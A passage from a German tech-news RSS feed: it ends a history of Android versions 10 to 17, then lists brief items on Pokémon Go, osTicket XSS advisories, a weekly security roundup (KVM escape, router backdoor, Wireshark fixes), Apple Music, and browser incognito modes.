<p>Im September 2019 ereilte der nächste Umschwung auch die Backwerk-affine Nomenklatur: <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 10 war die erste Version, die <a href="https://www.computerworld.com/article/1657690/android-10-end-of-whimsy.html" title="ausschließlich mit einer Zahl" target="_blank">ausschließlich mit einer Zahl</a> bezeichnet wird. Dazu passend brachte die Betriebssystem-Software auch eine völlig neu gestaltete Oberfläche mit sich, die ab diesem Zeitpunkt vollständig auf Wischbewegungen ausgelegt war.</p>



<p>Zu den wichtigen Verbesserungen, die <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 10 darüber hinaus an Bord hatte, gehörten ein aktualisiertes App-Berechtigungssystem mit tioefergehenden Kontrollmöglichkeiten, eine “Darkmode”-Option, ein Fokusmodus sowie die Möglichkeit, abzuspielende Mediendateien automatisch mit Untertiteln zu versehen.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Speziell in Sachen Standortdaten brachte Android 10 eine dringend nötige Nuancierung." title="Speziell in Sachen Standortdaten brachte Android 10 eine dringend nötige Nuancierung." src="https://images.computerwoche.de/bdb/3392490/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Speziell in Sachen Standortdaten brachte Android 10 eine dringend nötige Nuancierung.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<h2 class="wp-block-heading">Android Version 11</h2>



<p>Mit <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> Version 11 veröffentlichte Google im September 2020 ein umfassendes Software-Update, das zahlreiche Neuerungen brachte. Die wichtigste Änderung drehte sich <a href="https://www.computerworld.com/article/1629241/android-11-additions.html" title="um das Thema Datenschutz" target="_blank">um das Thema Datenschutz</a>: Das mit <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 10 eingeführte Berechtigungssystem wurde um die Möglichkeit erweitert, Apps einmaligen Zugriff auf Standortdaten, Kamera oder Mikrofon zu gewähren.</p>



<p>Mit <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 11 erschwerte Google außerdem, dass Apps den Standort der Nutzer im Hintergrund ermitteln können und führte eine Funktion ein, die Apps automatisch Berechtigungen entzieht, wenn diese für längere Zeit nicht genutzt wurden. Auf Interface-Ebene bot Android 11 außerdem einen vereinheitlichten Media Player, eine Benachrichtigungshistorie, die Möglichkeit, alle verbundenen Geräte in einer Übersicht anzuzeigen sowie eine native Screen-Recording-Funktion.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Der neue Einheits-Media-Player in Android 11." title="Der neue Einheits-Media-Player in Android 11." src="https://images.computerwoche.de/bdb/3392491/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Der neue Einheits-Media-Player in Android 11.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<h2 class="wp-block-heading">Android Version 12</h2>



<p>Die finale Version von <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 12 präsentierte Google pünktlich zur Markteinführung seiner Smartphones <a href="https://www.computerwoche.de/article/2809810/google-mutter-verdient-kraeftig.html" title="Pixel 6 und Pixel 6 Pro" target="_blank">Pixel 6 und Pixel 6 Pro</a> im Oktober 2021. Die wesentlichen Fortschritte waren bei dieser <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Version direkt sichtbar: Sie bot die wohl größte Interface-Überarbeitung bei Android seit Lollipop und führte einen aktualisierten Design-Standard namens “Material You” ein. Das fußt auf der Idee, das Erscheinungsbild des Betriebssystems mit dynamisch generierten Themes an die individuelle “Farbwelt” des Benutzers anzupassen. </p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Android 12 brachte einen völlig neuen frischen Look mit - dem " title="Android 12 brachte einen völlig neuen frischen Look mit - dem " src="https://images.computerwoche.de/bdb/3392492/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Android 12 brachte einen völlig neuen frischen Look mit – dem “Material You”-Designstandard sei Dank.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<p>Davon abgesehen hatte <a class="idgGlossaryLink" href="https://www.computerwoche.de/mobile/" target="_blank">Android</a> 12 auch ein (<a title="lange überfälliges" href="https://www.computerworld.com/article/1639159/android-missed-opportunity.html" target="_blank">lange überfälliges</a>) neues Widget-System sowie eine Reihe grundlegender Verbesserungen in den Bereichen Leistung, Sicherheit und Datenschutz zu bieten. In diesem Zuge erweiterte Google sein Betriebssystem auch um einen isolierten Bereich, der KI-Funktionen auch ohne Netzwerkzugriff und Datenexposition ermöglicht.</p>



<h2 class="wp-block-heading">Android Version 13</h2>



<p>Mit <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 13 veröffentlichte Google im August 2022 eine der bislang ungewöhnlichsten Android-Versionen: Sie ist eines der ehrgeizigsten Android-Updates überhaupt – beinhaltet gleichzeitig aber auch vornehmlich subtile Änderungen. Für das Nutzererlebnis spielte dabei auch eine tragende Rolle, auf welchem Device Android 13 installiert wurde. Für <a href="https://www.computerwoche.de/k/tablet-pc,3453" target="_blank" class="idgGlossaryLink">Tablets</a> und faltbare Smartphones führte <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 13 ein gänzlich neues Interface-Design ein – mit dem Ziel, ein verbessertes Benutzererlebnis auf größeren Bildschirmen zu realisieren. Das schlug sich auch in einem auf Multitasking ausgelegten, aktualisierten Split-Screen-Modus und einer Taskbar im Chrome-OS-Stil nieder. Darüber hinaus schuf Android 13 auch die Vorraussetzung dafür, dass Pixel-<a href="https://www.computerwoche.de/k/tablet-pc,3453" target="_blank" class="idgGlossaryLink">Tablets</a> als <a href="https://www.computerworld.com/article/1699827/google-assistant-working-from-home.html" title="stationäres Smart Display" target="_blank">stationäres Smart Display</a> fungieren konnten.</p>



<p>Mit Blick auf Smartphones war der Release von <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 13 weit weniger bedeutsam. Neben einigen kleineren visuellen Optimierungen führte diese Android-Version ein erweitertes System für die Zwischenablage ein, eine native Funktion, um QR-Codes zu scannen, sowie weitere Optimierungen in den Bereichen Datenschutz, Sicherheit und Leistung.</p>



<h2 class="wp-block-heading">Android Version 14</h2>



<p>Nach achtmonatiger Entwicklungsphase präsentierte Google Anfang Oktober 2023 Android 14 – zeitgleich zur Vorstellung seiner <a href="https://www.computerwoche.de/article/2829090/google-pixel-8-pro-im-business.html" title="Pixel-8-Smartphones" target="_blank">Pixel-8-Smartphones</a>. Auch diese <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Version kam eher subtil um die Ecke: Sie brachte zum Beispiel ein neues System zum Einsatz, um Text zwischen Apps im Drag-und-Drop-Verfahren auszutauschen, sowie native Anpassungsmöglichkeiten für den Android-Sperrbildschirm. Zudem durften die Nutzer mit Android 14 auf ein integriertes Dashboard zugreifen, um sämtliche ihrer Gesundheits- und Fitness-Daten zu managen.</p>



<p>Darüber hinaus enthält diese <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Version eine Reihe wichtiger Erweiterungen für die Barrierefreiheit – etwa eine On-Demand-Lupe, verbesserten Support für Hörgeräte sowie die Möglichkeit, eingehende Nachrichten über den Kamerablitz zu visualisieren. Die Benutzer von Pixel 8 und Pixel 8 Pro durften mit Android 14 auch erstmals und exklusiv Googles KI-basierten Wallpaper Creator austesten.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Der KI-basierte Wallpaper Generator in Android 14 liefert interessante Ergebnisse." title="Der KI-basierte Wallpaper Generator in Android 14 liefert interessante Ergebnisse." src="https://images.computerwoche.de/bdb/3392493/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Der KI-basierte Wallpaper Generator in Android 14 liefert interessante Ergebnisse.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<h2 class="wp-block-heading">Android Version 15</h2>



<p>Technisch betrachtet hat Google Android 15 bereits <a href="https://android-developers.googleblog.com/2024/09/android-15-is-released-to-aosp.html" target="_blank" rel="noreferrer noopener">im September 2024</a> veröffentlicht – allerdings tauchte die neue Android-Version erst <a href="https://blog.google/products/android/android-15/" target="_blank" rel="noreferrer noopener">ab Mitte Oktober</a> auf den hauseigenen Pixel-Geräten auf.</p>



<p>Mit Android 15 hält eine ganze <a href="https://www.computerworld.com/article/3564973/android-15-features-google-pixel-phone.html" target="_blank">eine Reihe bemerkenswerter neuer Funktionen</a> Einzug. Darunter eine „Private Space“-Option, die es ermöglicht, sensible Applikationen beziehungsweise Inhalte mit einer zusätzlichen Authentifizierungsebene auszustatten. Davon abgesehen verbessert Version 15 auch die mit Android 13 eingeführten Multitasking-Systeme weiter: Die Android Taskbar ist jetzt optional dauerhaft präsent. Außerdem lassen sich bestimmte App-Kombinationen ab Version 15 mit einem Fingertipp im Split-Screen-Modus aufrufen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2025/03/07-android-15-private-space.jpg?quality=50&amp;strip=all&amp;w=1024" alt="private space settings in android 15" class="wp-image-3852845" width="1024" height="1025" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Mit „Private Space“ sind bestimmte Apps ausschließlich über einen geschützten (und optional auch versteckten) Bereich abrufbar.</figcaption></figure><p class="imageCredit">JR Raphael / Foundry</p></div>



<p>Weitere nennenswerte Neuerungen von Android 15 sind ein neu designtes Lautstärkeregelungs-Panel sowie ein (Pixel-exklusives) „Adaptive Vibration“-Feature, dass die Vibrationsintensität an der jeweils aktuellen Umgebung ausrichtet.</p>



<h2 class="wp-block-heading">Android Version 16</h2>



<p>Mit dem Jahr 2025 hat Google beschlossen, seinen bisherigen Android-Upgrade-Zyklus aufzubrechen: Beginnend mit der <a href="https://developer.android.com/about/versions/16?hl=de" target="_blank" rel="noreferrer noopener">Veröffentlichung von Version 16</a> sollen künftig pro Jahr zwei Android-Versionen erscheinen. Den ersten Teil dieses Versprechens hat Google bereits mit der Veröffentlichung von Android 16 im Juni 2025 umgesetzt.</p>



<p>Zu den wichtigsten neuen Funktionen von Android 16 zählen unter anderem <a href="https://www.androidauthority.com/android-16-live-notifications-3518375/" target="_blank" rel="noreferrer noopener">Live-Updates</a> – eine neue Art von Benachrichtigungen, die ähnlich funktionieren wie die Live-Aktivitäten bei iOS. Darüber hinaus verspricht Version 16 des Google-Mobile-Betriebssystems auch <a href="https://www.androidauthority.com/android-16-quick-settings-redesign-hands-on-3534161/" target="_blank" rel="noreferrer noopener">eine Reihe von Verbesserungen</a> für die Benutzeroberfläche, <a href="https://www.androidauthority.com/android-desktop-view-3533755/" target="_blank" rel="noreferrer noopener">ein besseres Desktop-Erlebnis</a> sowie Support für striktere Netzwerksicherheitsregeln.   </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2025/03/android-version-16-beta-app-adapting.jpg?quality=50&amp;strip=all&amp;w=1024" alt="android version 16 beta app adapting for screen width on two different devices" class="wp-image-3851568" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Mit Android 16 sollen Android-Apps sich endlich auch im Großformat ordentlich präsentieren – statt etwa auf Tablets ein Smartphone zu „simulieren“.</figcaption></figure><p class="imageCredit">Google</p></div>



<h2 class="wp-block-heading">Android Version 17</h2>



<p>Die erste Beta-Version von Android 17 wurde von Google Mitte Februar 2026 veröffentlicht. Eine <a href="https://android-developers.googleblog.com/2026/02/the-second-beta-of-android-17.html" target="_blank" rel="noreferrer noopener">zweite Beta</a> folgte bereits wenig später. Die finale Version des aktuellen Google Mobil-Betriebssystems wurde Mitte Juni 2026 veröffentlicht. Ein Fokus liegt bei Android 17 auf einer optimierten User Experience für faltbare Devices und Tablets, ein weiterer auf KI.</p>



<figure class="wp-block-embed is-type-rich is-provider-x wp-block-embed-x"><div class="wp-block-embed__wrapper youtube-video">
<blockquote class="twitter-tweet" data-width="500" data-dnt="true"><p lang="en" dir="ltr">🖐 Five things you need to know about Android 17: <br><br>1️⃣ The intelligence system<br>2️⃣ Adaptive-first<br>3️⃣ Performance improvements<br>4️⃣ Permissions through pickers<br>5️⃣ Pro-quality camera &amp; media<br><br>Read the details → <a href="https://t.co/jiij02K3Gr">https://t.co/jiij02K3Gr</a> <a href="https://t.co/X7QcuvBJdo">pic.twitter.com/X7QcuvBJdo</a></p>— Android Developers (@AndroidDev) <a href="https://x.com/AndroidDev/status/2069767498199708126?ref_src=twsrc%5Etfw">June 24, 2026</a></blockquote>
</div></figure>



<p>(fm)</p>



<p><strong>Dieser Artikel ist <a href="https://www.computerworld.com/article/1714347/android-versions-a-living-history-from-1-0-to-today.html" target="_blank">im Original</a> bei unserer Schwesterpublikation Computerworld.com erschienen.</strong></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[A decade later, Pokémon Go finally made good on its original promise]]></title>
<description><![CDATA[When Niantic dropped the first Pokémon Go trailer in 2015, it was hard to grasp how a bunch of players could work together to catch a pokémon like Mewtwo. But this week at the game's 10th anniversary event in New York City, Pokémon Go showed the world how it's done. Almost 2,000 players (many of […]]]></description>
<link>https://tsecurity.de/de/3660744/it-nachrichten/a-decade-later-pokmon-go-finally-made-good-on-its-original-promise/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660744/it-nachrichten/a-decade-later-pokmon-go-finally-made-good-on-its-original-promise/</guid>
<pubDate>Fri, 10 Jul 2026 22:02:33 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[When Niantic dropped the first Pokémon Go trailer in 2015, it was hard to grasp how a bunch of players could work together to catch a pokémon like Mewtwo. But this week at the game's 10th anniversary event in New York City, Pokémon Go showed the world how it's done. Almost 2,000 players (many of […]]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-1176 | osTicket up to 1.9.3 Status cross site scripting (ID 130057 / BID-72276)]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, has been found in osTicket up to 1.9.3. This impacts an unknown function. This manipulation of the argument Status causes cross site scripting.

This vulnerability appears as CVE-2015-1176. The attack may be initiated remotely. There is no ava...]]></description>
<link>https://tsecurity.de/de/3660736/sicherheitsluecken/cve-2015-1176-osticket-up-to-193-status-cross-site-scripting-id-130057-bid-72276/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660736/sicherheitsluecken/cve-2015-1176-osticket-up-to-193-status-cross-site-scripting-id-130057-bid-72276/</guid>
<pubDate>Fri, 10 Jul 2026 21:52:37 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">problematic</a>, has been found in <a href="https://vuldb.com/product/osticket">osTicket up to 1.9.3</a>. This impacts an unknown function. This manipulation of the argument <em>Status</em> causes cross site scripting.

This vulnerability appears as <a href="https://vuldb.com/cve/CVE-2015-1176">CVE-2015-1176</a>. The attack may be initiated remotely. There is no available exploit.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-1347 | osTicket up to 1.9.4 client.inc.php lang cross site scripting]]></title>
<description><![CDATA[A vulnerability was found in osTicket up to 1.9.4 and classified as problematic. Affected by this issue is some unknown functionality of the file client.inc.php. Executing a manipulation of the argument lang can lead to cross site scripting.

This vulnerability is handled as CVE-2015-1347. The at...]]></description>
<link>https://tsecurity.de/de/3660734/sicherheitsluecken/cve-2015-1347-osticket-up-to-194-clientincphp-lang-cross-site-scripting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660734/sicherheitsluecken/cve-2015-1347-osticket-up-to-194-clientincphp-lang-cross-site-scripting/</guid>
<pubDate>Fri, 10 Jul 2026 21:52:34 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/osticket">osTicket up to 1.9.4</a> and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. Affected by this issue is some unknown functionality of the file <em>client.inc.php</em>. Executing a manipulation of the argument <em>lang</em> can lead to cross site scripting.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2015-1347">CVE-2015-1347</a>. The attack can be executed remotely. There is not any exploit available.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[The Cyber Express Weekly Roundup: Campus Cyberattack, Januscape VM Escape, Router Backdoors, UniFi Flaw, and Wireshark Security Updates]]></title>
<description><![CDATA[Enterprise infrastructure is increasingly under pressure as attackers and researchers alike expose weaknesses across the technology stack. This week, a confirmed university cyberattack, a critical Linux KVM virtualization flaw, vulnerabilities affecting widely deployed network management platform...]]></description>
<link>https://tsecurity.de/de/3659703/it-security-nachrichten/the-cyber-express-weekly-roundup-campus-cyberattack-januscape-vm-escape-router-backdoors-unifi-flaw-and-wireshark-security-updates/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659703/it-security-nachrichten/the-cyber-express-weekly-roundup-campus-cyberattack-januscape-vm-escape-router-backdoors-unifi-flaw-and-wireshark-security-updates/</guid>
<pubDate>Fri, 10 Jul 2026 14:38:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="800" height="533" src="https://thecyberexpress.com/wp-content/uploads/Weekly-Roundup.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Weekly Roundup" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Weekly-Roundup.webp 800w, https://thecyberexpress.com/wp-content/uploads/Weekly-Roundup-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Weekly-Roundup-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Weekly-Roundup-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Weekly-Roundup-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Weekly-Roundup-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Weekly-Roundup.webp 800w, https://thecyberexpress.com/wp-content/uploads/Weekly-Roundup-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Weekly-Roundup-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Weekly-Roundup-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Weekly-Roundup-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Weekly-Roundup-750x500.webp 750w" sizes="(max-width: 800px) 100vw, 800px" title="The Cyber Express Weekly Roundup: Campus Cyberattack, Januscape VM Escape, Router Backdoors, UniFi Flaw, and Wireshark Security Updates 1"></p><p class="PDq2pG_selectionAnchorContainer" data-start="143" data-end="737">Enterprise infrastructure is increasingly under pressure as attackers and researchers alike expose weaknesses across the technology stack. This week, a confirmed university cyberattack, a critical Linux KVM virtualization flaw, vulnerabilities affecting widely deployed network management platforms, and an undocumented firmware backdoor in consumer and SMB routers underscore how trusted infrastructure remains an attractive target. At the same time, the latest Wireshark release highlights the importance of maintaining the security of defensive tools that security teams depend on every day.</p>
<p data-start="739" data-end="1189">The week's developments reinforce a broader reality: <a class="wpil_keyword_link" href="https://thecyberexpress.com/cyber-news/" title="cyber" data-wpil-keyword-link="linked" data-wpil-monitor-id="28920">cyber</a> resilience is no longer limited to endpoint protection or identity security. Organizations must continuously monitor and patch hypervisors, network appliances, firmware, and security software to reduce exposure. As enterprises expand hybrid infrastructure and rely on increasingly interconnected systems, even a single overlooked <a class="wpil_keyword_link" href="https://thecyberexpress.com/firewall-daily/vulnerabilities/" title="vulnerability" data-wpil-keyword-link="linked" data-wpil-monitor-id="28918">vulnerability</a> can have far-reaching operational consequences.</p>

<h2 data-section-id="1lvh413" data-start="1191" data-end="1226"><strong>The Cyber Express Weekly Roundup</strong></h2>
<h3 data-section-id="1lw2g4u" data-start="1228" data-end="1309">Mount Royal University Confirms Cyberattack Following June Network Disruption</h3>
<p data-start="1311" data-end="2015">Mount Royal University (MRU) confirmed that a June <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-cybersecurity/" title="cybersecurity" data-wpil-keyword-link="linked" data-wpil-monitor-id="28921">cybersecurity</a> incident resulted in unauthorized access to systems containing sensitive student and employee information. Although the institution restored critical services after the disruption, investigations determined that personal <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="data" data-wpil-keyword-link="linked" data-wpil-monitor-id="28926">data</a> may have been exposed, prompting notifications to affected individuals and ongoing forensic analysis. The incident serves as another reminder that higher education institutions remain lucrative targets due to the large volumes of personal, financial, and research data they manage, making rapid <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-incident-response/" target="_blank" rel="noopener" title="incident response" data-wpil-keyword-link="linked" data-wpil-monitor-id="28925">incident response</a> and transparent communication critical following cyber events. <a href="https://thecyberexpress.com/mount-royal-university-cyberattack/" target="_blank" rel="nofollow noopener"><strong>Read more...</strong></a></p>

<h3 data-section-id="mylb4w" data-start="2017" data-end="2097">Januscape (CVE-2026-53359) Exposes Linux KVM Hosts to Virtual Machine Escape</h3>
<p data-start="2099" data-end="2802">Researchers disclosed <strong data-start="2121" data-end="2151">Januscape (CVE-2026-53359)</strong>, a critical use-after-free vulnerability in the Linux Kernel-based Virtual Machine (KVM) hypervisor that enables guest virtual machines to escape isolation and compromise the underlying host. The flaw, which remained undiscovered for nearly 16 years, affects both Intel and AMD x86 platforms and poses a significant threat to public cloud providers operating multi-tenant environments with nested virtualization enabled. Security teams are urged to deploy available patches immediately, as successful exploitation could allow complete host compromise or widespread denial-of-service across shared infrastructure. <a href="https://thecyberexpress.com/cve-2026-53359-januscape/" target="_blank" rel="nofollow noopener"><strong>Read more...</strong></a></p>

<h3 data-section-id="pzoz75" data-start="2804" data-end="2886">Ubiquiti UniFi OS Vulnerability Raises Risks for Enterprise Network Management</h3>
<p data-start="2888" data-end="3526">A newly disclosed vulnerability affecting <strong data-start="2930" data-end="2951"><a href="https://community.ui.com/releases/Security-Advisory-Bulletin-066-066/984eceb3-49c8-4227-942d-671c289b3afc" target="_blank" rel="nofollow noopener">Ubiquiti</a> UniFi OS</strong> highlights the continued importance of securing centralized network management platforms. Because UniFi deployments often provide administrators with visibility and control over networking infrastructure, successful exploitation could expose organizations to unauthorized access or broader compromise of managed environments. Administrators are advised to review affected versions, apply vendor updates without delay, and restrict management interface exposure wherever possible to minimize risk while remediation efforts are completed. <a href="https://thecyberexpress.com/cve-2026-50746-ubiquiti-unifi-os-vulnerability/" target="_blank" rel="nofollow noopener"><strong>Read more...</strong></a></p>

<h3 data-section-id="1evchd1" data-start="3528" data-end="3600">Hidden Tenda Firmware Backdoor Leaves Multiple Router Models Exposed</h3>
<p data-start="3602" data-end="4395">Security researchers and CERT/CC disclosed <strong data-start="3645" data-end="3663">CVE-2026-11405</strong>, an undocumented authentication backdoor affecting multiple Tenda router firmware versions. Rather than exploiting a traditional software bug, attackers can bypass normal authentication through a hidden administrative login mechanism, potentially gaining full control of affected devices. With no vendor patch available at the time of disclosure, the vulnerability raises broader concerns around firmware security, supply-chain trust, and the long-term <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-are-risks-in-cybersecurity/" title="risks" data-wpil-keyword-link="linked" data-wpil-monitor-id="28923">risks</a> posed by undocumented functionality embedded within networking equipment. Organizations using affected devices should disable remote management where possible and limit administrative interface exposure until updates become available. <a href="https://thecyberexpress.com/cve-2026-11405-cert-tenda-firmware-backdoor/" target="_blank" rel="nofollow noopener"><strong>Read more...</strong></a></p>

<h3 data-section-id="1p4t171" data-start="4397" data-end="4460">Wireshark 4.6.7 Addresses Multiple Security Vulnerabilities</h3>
<p data-start="4462" data-end="5121">The release of <strong data-start="4477" data-end="4496">Wireshark 4.6.7</strong> delivers fixes for a dozen security issues affecting protocol dissectors, including SSH, IEEE 802.11, Catapult DCT2000, and several other supported protocols. While Wireshark is primarily a defensive analysis tool, <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-are-vulnerabilities/" title="vulnerabilities" data-wpil-keyword-link="linked" data-wpil-monitor-id="28922">vulnerabilities</a> within packet inspection software can expose analysts and security operations teams to unnecessary risk when processing malicious or specially crafted network captures. Organizations using Wireshark for incident response, <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-malware/" target="_blank" rel="noopener" title="malware" data-wpil-keyword-link="linked" data-wpil-monitor-id="28919">malware</a> analysis, or network monitoring should prioritize upgrading to the latest version to ensure secure packet analysis workflows. <a href="https://thecyberexpress.com/wireshark-4-6-7/" target="_blank" rel="nofollow noopener"><strong>Read more...</strong></a></p>

<h2 data-section-id="13p0ph5" data-start="5123" data-end="5141"><strong>Weekly Takeaway</strong></h2>
<p data-start="5143" data-end="5654">This week's developments demonstrate that enterprise infrastructure itself has become one of the most contested areas of <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="cybersecurity" data-wpil-keyword-link="linked" data-wpil-monitor-id="28927">cybersecurity</a>. Whether through virtualization layers, router firmware, network management platforms, or even the tools defenders rely upon, attackers continue to target foundational technologies that underpin modern IT environments. These components often operate with elevated privileges or broad visibility across enterprise networks, making their compromise disproportionately impactful.</p>
<p data-start="5656" data-end="6226" data-is-last-node="" data-is-only-node="">For security leaders, the lesson is clear: infrastructure security requires continuous attention beyond traditional endpoint defenses. Routine firmware updates, timely <a class="wpil_keyword_link" href="https://cyble.com/solutions/vulnerability-management/" target="_blank" rel="noopener" title="vulnerability management" data-wpil-keyword-link="linked" data-wpil-monitor-id="28924">vulnerability management</a>, restricted administrative interfaces, and proactive monitoring of virtualization platforms should form part of every organization's cyber resilience strategy. As enterprises continue expanding cloud deployments and interconnected environments, maintaining trust in the underlying infrastructure will remain just as important as defending the applications running on top of it.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Music enthüllt: Das sind die erfolgreichsten Musiker der Plattform]]></title>
<description><![CDATA[Apple Music hat die meistgestreamten Künstler*innen seit dem Start des Musikdienstes im Sommer 2015 veröffentlicht. Die Top 20 (via AppleInsider) vereint die größten Stars aus Hip-Hop, Pop, Rap und verwandten Genres.]]></description>
<link>https://tsecurity.de/de/3654102/it-nachrichten/apple-music-enthuellt-das-sind-die-erfolgreichsten-musiker-der-plattform/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654102/it-nachrichten/apple-music-enthuellt-das-sind-die-erfolgreichsten-musiker-der-plattform/</guid>
<pubDate>Wed, 08 Jul 2026 13:18:20 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple Music hat die meistgestreamten Künstler*innen seit dem Start des Musikdienstes im Sommer 2015 veröffentlicht. Die Top 20 (via AppleInsider) vereint die größten Stars aus Hip-Hop, Pop, Rap und verwandten Genres.]]></content:encoded>
</item>
<item>
<title><![CDATA[Wenn KI das Finanzsystem hackt: Die EZB schlägt Alarm]]></title>
<description><![CDATA[... Cyber-Security. ... Für deutsche Großbanken wie Deutsche Bank oder Commerzbank bedeutet das: IT-Security wird vom Kostenfaktor zum strategischen ...]]></description>
<link>https://tsecurity.de/de/3654032/it-security-nachrichten/wenn-ki-das-finanzsystem-hackt-die-ezb-schlaegt-alarm/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654032/it-security-nachrichten/wenn-ki-das-finanzsystem-hackt-die-ezb-schlaegt-alarm/</guid>
<pubDate>Wed, 08 Jul 2026 12:54:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[... <b>Cyber</b>-<b>Security</b>. ... Für deutsche Großbanken wie Deutsche Bank oder Commerzbank bedeutet das: <b>IT</b>-<b>Security</b> wird vom Kostenfaktor zum strategischen ...]]></content:encoded>
</item>
<item>
<title><![CDATA[How to go incognito in Chrome, Edge, Firefox, and Safari]]></title>
<description><![CDATA[Private browsing. Incognito. Privacy mode.



Web browser functions like those trace their roots back more than a decade, and the feature — first found in a top browser in 2005 — spread quickly as one copied another, made tweaks and minor improvements.



But privacy-promising labels can be treac...]]></description>
<link>https://tsecurity.de/de/3652543/it-nachrichten/how-to-go-incognito-in-chrome-edge-firefox-and-safari/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652543/it-nachrichten/how-to-go-incognito-in-chrome-edge-firefox-and-safari/</guid>
<pubDate>Tue, 07 Jul 2026 20:51:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Private browsing. Incognito. Privacy mode.</p>



<p>Web browser functions like those trace their roots back more than a decade, and the feature — first found in a top browser in 2005 — spread quickly as one copied another, made tweaks and minor improvements.</p>



